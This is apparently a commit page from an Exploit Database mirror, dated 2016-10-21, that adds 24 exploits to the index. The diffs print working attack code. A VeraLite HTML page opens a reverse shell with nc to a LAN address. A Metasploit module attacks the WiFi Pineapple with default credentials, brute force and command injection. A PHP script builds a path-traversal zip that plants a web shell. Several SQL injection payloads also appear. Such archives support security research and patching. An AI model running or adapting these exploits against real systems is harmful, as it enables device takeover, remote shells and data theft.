bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-21

Browse source 
24 new exploits

NetAuctionHelp 4.1 - search.asp SQL Injection

Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution
Microsoft Edge - Array.map Heap Overflow (MS16-119)

Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow
Microsoft Edge - Array.join Info Leak (MS16-119)

Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)

HikVision Security Systems - Activex Buffer Overflow
Oracle Netbeans IDE 8.1 - Directory Traversal
MiCasa VeraLite - Remote Code Execution
Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection
Classifieds Rental Script - SQL Injection
SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service
SAP Adaptive Server Enterprise  16 - Denial of Service
Event Calendar PHP 1.5 - SQL Injection
SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution
SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal
SPIP 3.1.2 - Cross-Site Request Forgery
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Edge - Spread Operator Stack Overflow (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)
Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
This commit is contained in:
Offensive Security 2016-10-21 05:01:17 +00:00
parent 77b46b2163
commit 07fdc778ee
28 changed files with 3550 additions and 78 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
files.csv
View file

@ -27437,7 +27437,6 @@ id,file,description,date,author,platform,type,port
30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php' config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0
30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - search.asp SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0
30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
@ -27787,7 +27786,7 @@ id,file,description,date,author,platform,type,port
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
30765,platforms/osx/local/30765.c,"Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0
40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
@ -27795,7 +27794,7 @@ id,file,description,date,author,platform,type,port
30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow",2007-11-16,cocoruder,windows,dos,0
40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
@ -36679,10 +36678,11 @@ id,file,description,date,author,platform,type,port
40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
40579,platforms/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40580,platforms/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40581,platforms/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
@ -36692,3 +36692,24 @@ id,file,description,date,author,platform,type,port
40584,platforms/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps,0
40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
40588,platforms/multiple/local/40588.txt,"Oracle Netbeans IDE 8.1 - Directory Traversal",2016-10-20,hyp3rlinx,multiple,local,0
40589,platforms/hardware/remote/40589.html,"MiCasa VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0
40590,platforms/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",xml,webapps,0
40591,platforms/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",php,webapps,0
40592,platforms/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,windows,dos,0
40593,platforms/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,windows,dos,0
40594,platforms/php/webapps/40594.txt,"Event Calendar PHP 1.5 - SQL Injection",2016-10-20,"Ehsan Hosseini",php,webapps,0
40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099

Can't render this file because it is too large.

9
platforms/asp/webapps/30798.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/26540/info
NetAuctionHelp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
NetAuctionHelp 4.1 is vulnerable; other versions may also be affected.
http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- http://www.example.com/search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- http://www.example.com/itemdtl.asp?id=1-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

156
platforms/hardware/remote/40589.html Executable file
View file

@ -0,0 +1,156 @@
# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware
1. Description
A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
2. Proof of Concept
<!--
@about
This file, when loaded in a browser, will attempt to get a reverse shell
on a VeraLite device on the client's network. This is achieved with the
following steps:
1. Acquire the client's internal IP address using webrtc. We then assume the
client is operating on a \24 network.
2. POST :49451/z3n.html to every address on the subnet. This leverages two
things we know to be true about VeraLite:
- there should be a UPnP HTTP server on 49451
- VeraLite uses a libupnp vulnerable to CVE-2016-6255.
3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
successfully created the file via CVE-2016-6255
4. z3n.html will allow us to bypass same origin policy and it will make a
POST request that executes RunLau. This also leverages information we
know to be true about Veralite:
- the control URL for HomeAutomationGateway is /upnp/control/hag
- no auth required
5. Our RunLua code executes a reverse shell to 192.168.217:1270.
@note
This code doesn't run fast in Firefox. This appears to largely be a performance
issue associated with attaching a lot of iframes to a page. Give the shell
popping a couple of minutes. In Chrome, it runs pretty fast but might
exhaust socket usage.
@citations
- WebRTC IP leak: https://github.com/diafygi/webrtc-ips
- Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
- CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script>
/**
* POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
* libupnp then the page will be written. Once the request has
* completed, we attempt to load it in an iframe in order to bypass
* same origin policy. If the page is loaded into the iframe then
* it will make a soap action request with the action RunLua. The
* Lua code will execute a reverse shell.
* @param ip the ip address to request to
* @param frame_id the id of the iframe to create
*/
function create_page(ip, frame_id)
{
payload = "<!DOCTYPE html>\n" +
"<html>\n" +
"<head>\n" +
"<title>Try To See It Once My Way</title>\n" +
"<script>\n" +
"function exec_lua() {\n" +
"soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
"soap_request += \"<s:Body>\";\n" +
"soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
"soap_request += \"<Code>os.execute("/bin/sh -c &apos;(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&&apos;")</Code>\";\n" +
"soap_request += \"</u:RunLua>\";\n" +
"soap_request += \"</s:Body>\";\n" +
"soap_request += \"</s:Envelope>\";\n" +
"xhttp = new XMLHttpRequest();\n" +
"xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
"xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
"xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
"xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
"xhttp.send(soap_request);\n" +
"}\n" +
"</scr\ipt>\n" +
"</head>\n" +
"<body onload=\"exec_lua()\">\n" +
"Zen?\n" +
"</body>\n" +
"</html>";
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://" + ip + ":49451/z3n.html", true);
xhttp.timeout = 1000;
xhttp.onreadystatechange = function()
{
if (xhttp.readyState == XMLHttpRequest.DONE)
{
new_iframe = document.createElement('iframe');
new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
new_iframe.setAttribute("id", frame_id);
new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
document.body.appendChild(new_iframe);
}
};
xhttp.send(payload);
}
/**
* This function abuses the webrtc internal IP leak. This function
* will find the the upper three bytes of network address and simply
* assume that the client is on a \24 network.
*
* Once we have an ip range, we will attempt to create a page on a
* vulnerable libupnp server via create_page().
*/
function spray_and_pray()
{
RTCPeerConnection = window.RTCPeerConnection ||
window.mozRTCPeerConnection ||
window.webkitRTCPeerConnection;
peerConn = new RTCPeerConnection({iceServers:[]});
noop = function() { };
peerConn.createDataChannel("");
peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
peerConn.onicecandidate = function(ice)
{
if (!ice || !ice.candidate || !ice.candidate.candidate)
{
return;
}
clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
peerConn.onicecandidate = noop;
if (clientNetwork && clientNetwork.length > 0)
{
for (i = 0; i < 255; i++)
{
create_page(clientNetwork + '.' + i, "page"+i);
}
}
};
}
</script>
</head>
<body onload="spray_and_pray()">
Everything zen.
</body>
</html>
3. Solution:
No solution exists

262
platforms/linux/remote/40609.rb Executable file
View file

@ -0,0 +1,262 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
We use a combination of default credentials with a weakness in the anti-csrf generation to achieve
command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,
you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a
known password if successful and may interrupt the user experience. These devices may typically be identified
by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting
worm.
},
'Author' => ['catatonicprime'],
'License' => MSF_LICENSE,
'References' => [[ 'CVE', '2015-4624' ]],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python netcat telnet'
}
},
'Targets' => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2015'
))
register_options(
[
OptString.new('USERNAME', [ true, 'The username to use for login', 'root' ]),
OptString.new('PASSWORD', [ true, 'The password to use for login', 'pineapplesareyummy' ]),
OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
Opt::RPORT(1471),
Opt::RHOST('172.16.42.1')
]
)
register_advanced_options(
[
OptBool.new('BruteForce', [ false, 'When true, attempts to solve LED puzzle after login failure', false ]),
OptInt.new('BruteForceTries', [ false, 'Number of tries to solve LED puzzle, 0 -> infinite', 0 ])
]
)
deregister_options(
'ContextInformationFile',
'DOMAIN',
'DigestAuthIIS',
'EnableContextEncoding',
'FingerprintCheck',
'HttpClientTimeout',
'NTLM::SendLM',
'NTLM::SendNTLM',
'NTLM::SendSPN',
'NTLM::UseLMKey',
'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2',
'SSL',
'SSLVersion',
'VERBOSE',
'WORKSPACE',
'WfsDelay',
'Proxies',
'VHOST'
)
end
def login_uri
normalize_uri('includes', 'api', 'login.php')
end
def brute_uri
normalize_uri("/?action=verify_pineapple")
end
def set_password_uri
normalize_uri("/?action=set_password")
end
def phpsessid
datastore['PHPSESSID']
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def cookie
"PHPSESSID=#{phpsessid}"
end
def csrf_token
Digest::SHA1.hexdigest datastore['PHPSESSID']
end
def use_brute
datastore['BruteForce']
end
def use_brute_tries
datastore['BruteForceTries']
end
def login
# Create a request to login with the specified credentials.
res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'vars_post' => {
'username' => username,
'password' => password,
'login' => "" # Merely indicates to the pineapple that we'd like to login.
},
'headers' => {
'Cookie' => cookie
}
)
return nil unless res
# Successful logins in preconfig pineapples include a 302 to redirect you to the "please config this device" pages
return res if res.code == 302 && (res.body !~ /invalid username/)
# Already logged in message in preconfig pineapples are 200 and "Invalid CSRF" - which also indicates a success
return res if res.code == 200 && (res.body =~ /Invalid CSRF/)
nil
end
def cmd_inject(cmd)
res = send_request_cgi(
'method' => 'POST',
'uri' => target_uri.path,
'cookie' => cookie,
'vars_get' => {
'execute' => "" # Presence triggers command execution
},
'vars_post' => {
'_csrfToken' => csrf_token,
'commands' => cmd
}
)
res
end
def brute_force
print_status('Beginning brute forcing...')
# Attempt to get a new session cookie with an LED puzzle tied to it.
res = send_request_cgi(
'method' => 'GET',
'uri' => brute_uri
)
# Confirm the response indicates there is a puzzle to be solved.
if !res || !(res.code == 200) || res.body !~ /own this pineapple/
print_status('Brute forcing not available...')
return nil
end
cookies = res.get_cookies
counter = 0
while use_brute_tries.zero? || counter < use_brute_tries
print_status("Try #{counter}...") if (counter % 5).zero?
counter += 1
res = send_request_cgi(
'method' => 'POST',
'uri' => brute_uri,
'cookie' => cookies,
'vars_post' => {
'green' => 'on',
'amber' => 'on',
'blue' => 'on',
'red' => 'on',
'verify_pineapple' => 'Continue'
}
)
if res && res.code == 200 && res.body =~ /set_password/
print_status('Successfully solved puzzle!')
return write_password(cookies)
end
end
print_warning("Failed to brute force puzzle in #{counter} tries...")
nil
end
def write_password(cookies)
print_status("Attempting to set password to: #{password}")
res = send_request_cgi(
'method' => 'POST',
'uri' => set_password_uri,
'cookie' => cookies,
'vars_post' => {
'password' => password,
'password2' => password,
'eula' => 1,
'sw_license' => 1,
'set_password' => 'Set Password'
}
)
if res && res.code == 200 && res.body =~ /success/
print_status('Successfully set password!')
return res
end
print_warning('Failed to set password')
nil
end
def check
loggedin = login
unless loggedin
brutecheck = send_request_cgi(
'method' => 'GET',
'uri' => brute_uri
)
return Exploit::CheckCode::Safe if !brutecheck || !brutecheck.code == 200 || brutecheck.body !~ /own this pineapple/
return Exploit::CheckCode::Vulnerable
end
cmd_success = cmd_inject("echo")
return Exploit::CheckCode::Vulnerable if cmd_success && cmdSuccess.code == 200 && cmd_success.body =~ /Executing/
Exploit::CheckCode::Safe
end
def exploit
print_status('Logging in with credentials...')
loggedin = login
if !loggedin && use_brute
brute_force
loggedin = login
end
unless loggedin
fail_with(Failure::NoAccess, "Failed to login PHPSESSID #{phpsessid} with #{username}:#{password}")
end
print_status('Executing payload...')
cmd_inject("#{payload.encoded}")
end
end

143
platforms/linux/remote/40610.rb Executable file
View file

File diff suppressed because one or more lines are too long

128
platforms/multiple/local/40588.txt Executable file
View file

@ -0,0 +1,128 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.oracle.com
Product:
=================
Netbeans IDE v8.1
Vulnerability Type:
=========================
Import Directory Traversal
CVE Reference:
==============
CVE-2016-5537
Vulnerability Details:
=====================
This was part of Oracle Critical Patch Update for October 2016.
Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans.
Vulnerability in way Netbeans processes ".zip" archives to be imported as project. If a user imports a malicious project
containing "../" characters the import will fail, yet still process the "../". we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server etc...
It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.
References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW
Exploit Code(s):
=================
<?php
#archive path traversal
#target xampp htdocs as POC
#by hyp3rlinx
#===============================
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default? Y/[file]>";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='<?php exec($_GET["cmd"]); ?>';
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double
quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\",
$depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo "================ hyp3rlinx ===================";
?>
Disclosure Timeline:
=======================================
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=====================
CVSS VERSION 3.0 RISK
5.7
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

52
platforms/osx/local/30765.c
View file

@ -1,52 +0,0 @@
source: http://www.securityfocus.com/bid/26444/info
Apple Mac OS X is prone to multiple security vulnerabilities.
These issues affect Mac OS X and various applications, including AppleRAID, CFFTP, CFNetwork, CoreFoundation, CoreText, kernel, remote_cmds, networking, NFS, NSURL, SecurityAgent, WebCore, and WebKit.
Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers.
Apple Mac OS X 10.4.10 and prior versions are vulnerable to these issues.
#include <stdio.h>
#include <stdlib.h>
#include <architecture/i386/table.h>
#include <i386/user_ldt.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
int
main(void)
{
union ldt_entry descs;
char *buf;
u_long pgsz = sysconf(_SC_PAGESIZE);
if ((buf = (char *)malloc(pgsz * 4)) == -1) {
perror("malloc");
exit(EXIT_FAILURE);
}
memset(buf, 0x41, pgsz * 4);
buf = (char *)(((u_long)buf & ~pgsz) + pgsz);
if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz,
PROT_WRITE) == -1) {
perror("mprotect");
exit(EXIT_FAILURE);
}
/*
* This will result in kalloc() size argument being 0x00000000 and copyin()
* size argument being 0xfffffff8.
*/
if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) {
perror("i386_set_ldt");
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}

26
platforms/php/webapps/40591.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/viewproducts.php?catid=PoC%27
# Exploit (using Sqlmap)
---
Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: catid=-1285' OR 8060=8060#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---

30
platforms/php/webapps/40594.txt Executable file
View file

@ -0,0 +1,30 @@
=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
